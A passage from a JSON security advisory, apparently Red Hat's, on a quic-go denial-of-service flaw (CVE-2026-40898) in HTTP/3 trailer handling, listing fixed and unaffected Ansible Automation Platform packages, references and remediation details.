"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2484875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in quic-go, an implementation of the QUIC protocol in Go. A remote attacker can exploit this by sending specially crafted HTTP/3 trailer fields. This can cause the system to allocate excessive memory, leading to a denial-of-service (DoS) condition where the affected server or client may crash or run out of resources.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/quic-go/quic-go: quic-go: Denial of Service via excessive memory allocation in HTTP/3 trailers",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial-of-service flaw in `quic-go` that allows a remote attacker to exhaust system memory by sending specially crafted HTTP/3 trailer fields. This can lead to crashes or resource unavailability in affected Red Hat products utilizing `quic-go` for HTTP/3 communication, impacting both client and server implementations.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
],
"known_not_affected": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40898"
},
{
"category": "external",
"summary": "RHBZ#2484875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2484875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40898",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40898"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40898"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1",
"url": "https://github.com/quic-go/quic-go/releases/tag/v0.59.1"
},
{
"category": "external",
"summary": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9",
"url": "https://github.com/quic-go/quic-go/security/advisories/GHSA-vvgj-x9jq-8cj9"
}
],
"release_date": "2026-06-04T17:43:36.803000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
